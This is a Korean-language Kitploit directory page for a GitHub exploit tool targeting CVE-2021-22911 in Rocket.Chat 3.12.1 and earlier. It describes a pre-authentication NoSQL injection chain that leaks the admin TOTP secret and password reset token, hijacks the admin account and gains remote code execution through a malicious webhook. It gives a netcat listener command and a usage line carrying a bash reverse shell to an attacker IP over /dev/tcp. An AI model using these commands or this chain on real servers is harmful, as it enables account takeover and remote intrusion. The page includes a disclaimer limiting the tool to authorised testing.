Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-22911-RocketChat | Kitploit
도구/GitHubGitHub/faridi-m/cve-2021-22911-rocketchat
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubfaridi-m/cve-2021-22911-rocketchat

CVE-2021-22911-RocketChat

저장소 보기
25개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2021-22911 — Rocket.Chat 3.12.1 RCE (즉석)

설명

Rocket.Chat 3.12.1의 사전 인증(pre-auth) NoSQL 인젝션 취약점을 악용하여 관리자의 TOTP 비밀키와 비밀번호 재설정 토큰을 유출하고, 관리자 계정을 탈취한 뒤 악성 웹훅 통합을 통해 RCE를 달성합니다.

영향받는 버전

Rocket.Chat <= 3.12.1

요구 사항

pip install -r requirements.txt

설정 - 먼저 리스너 시작하기

익스플로잇을 실행하기 전에, 별도의 터미널에서 netcat 리스너를 시작하여 들어오는 리버스 셸을 받으세요:

root@kitploit:~
nc -lvnp 4444

이 터미널을 열어 두세요. 익스플로잇이 성공적으로 실행되면 셸이 여기에 표시됩니다.

사용법

root@kitploit:~
python3 pwn_rocketchat.py \
  -t 'http://TARGET:3000' \
  -u 'USERNAME' \
  -p 'PASSWORD' \
  -e '[email protected]' \
  -a 'adminusername' \
  -c '/bin/bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'

인자

작동 원리

  1. DDP 프로토콜을 통해 낮은 권한의 사용자로 인증합니다
  2. NoSQL $where 인젝션을 통해 관리자 TOTP 비밀키를 유출합니다
  3. 관리자 비밀번호 재설정 이메일을 트리거합니다
  4. NoSQL $where 인젝션을 통해 관리자 비밀번호 재설정 토큰을 유출합니다
  5. 유출된 TOTP 비밀키를 사용하여 2FA를 우회하고 관리자 비밀번호를 재설정합니다
  6. 악성 웹훅 통합을 생성하고 RCE를 트리거합니다

면책 조항

이 도구는 교육 목적 및 공인된 침투 테스트용으로만 제작되었습니다. 작성자는 이 도구의 오용 또는 이로 인해 발생한 피해에 대해 책임을 지지 않습니다. 테스트를 수행하기 전에 항상 적절한 서면 승인을 받으십시오.

참조

  • https://nvd.nist.gov/vuln/detail/CVE-2021-22911
도구 다운로드
플래그설명
-t대상 Rocket.Chat URL
-u등록된 낮은 권한(low-priv) 사용자 이름
-p등록된 낮은 권한(low-priv) 비밀번호
-e관리자 이메일 주소
-a관리자 사용자 이름
-c리버스 셸 명령
-v상세(verbose) 모드 (원시 응답 표시)